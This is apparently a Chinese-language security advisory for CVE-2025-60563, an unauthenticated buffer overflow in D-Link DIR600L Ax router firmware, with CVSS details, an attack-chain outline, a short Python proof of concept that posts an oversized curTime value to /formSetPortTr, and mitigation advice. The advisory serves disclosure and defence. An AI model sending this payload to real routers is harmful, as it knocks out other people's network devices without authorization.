IPBUF安全漏洞报告
English
CVE-2025-60563 CVSS 7.5 高危

D-Link DIR600L Ax缓冲区溢出漏洞 (CVE-2025-60563)

披露日期: 2025-10-24

漏洞信息

漏洞编号
CVE-2025-60563
漏洞类型
缓冲区溢出
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR600L Ax FW116WWb01

相关标签

缓冲区溢出D-Link路由器漏洞CVE-2025-60563拒绝服务网络设备漏洞WEB安全

漏洞概述

D-Link DIR600L Ax FW116WWb01版本路由器存在缓冲区溢出漏洞。该漏洞位于formSetPortTr函数中,攻击者可通过构造恶意的curTime参数值触发缓冲区溢出。由于该漏洞可通过网络远程利用,且无需认证,因此具有较高的安全风险。成功利用此漏洞可能导致设备拒绝服务攻击,影响网络服务的可用性。攻击者可发送精心构造的HTTP请求到受影响设备的Web管理界面,在无需任何身份验证的情况下触发该漏洞,造成设备崩溃或重启。

技术细节

该缓冲区溢出漏洞发生在D-Link DIR600L Ax路由器的formSetPortTr函数中。漏洞源于对用户输入的curTime参数缺乏适当的边界检查。当攻击者向该函数提交超长的字符串时,会导致缓冲区溢出,覆盖相邻的内存区域。由于漏洞出现在Web管理界面的处理逻辑中,攻击者可通过HTTP请求直接触发。攻击者无需认证即可利用此漏洞,这大大降低了攻击难度。溢出会导致程序执行流程被破坏,可能造成拒绝服务(设备崩溃或重启),在特定条件下也可能被利用执行任意代码。

攻击链分析

STEP 1
步骤1
攻击者识别目标设备为D-Link DIR600L Ax路由器,并访问其Web管理界面
STEP 2
步骤2
攻击者向/formSetPortTr端点发送HTTP POST请求,在curTime参数中注入超长字符串
STEP 3
步骤3
formSetPortTr函数接收到恶意的curTime参数,由于缺乏边界检查导致缓冲区溢出
STEP 4
步骤4
溢出数据覆盖相邻内存区域,可能导致程序崩溃或控制流被劫持
STEP 5
步骤5
成功利用后,攻击者可造成设备拒绝服务(DoS)或在特定条件下执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-60563 PoC - D-Link DIR600L Ax Buffer Overflow # Target: D-Link DIR600L Ax FW116WWb01 # Vulnerability: Buffer overflow in formSetPortTr function via curTime parameter target_ip = "192.168.0.1" target_url = f"http://{target_ip}/formSetPortTr" # Generate payload with oversized curTime parameter to trigger buffer overflow # Typical buffer overflow occurs with payloads exceeding 256-512 bytes payload = "A" * 1000 data = { "curTime": payload, "portTrEnable": "1" } try: response = requests.post(target_url, data=data, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Payload length: {len(payload)}") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}")

影响范围

D-Link DIR600L Ax FW116WWb01

防御指南

临时缓解措施
在官方补丁发布前,建议通过ACL规则限制对路由器管理界面的访问,仅允许受信任的IP地址访问Web管理功能。同时定期检查设备运行状态,发现异常时及时重启恢复服务。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表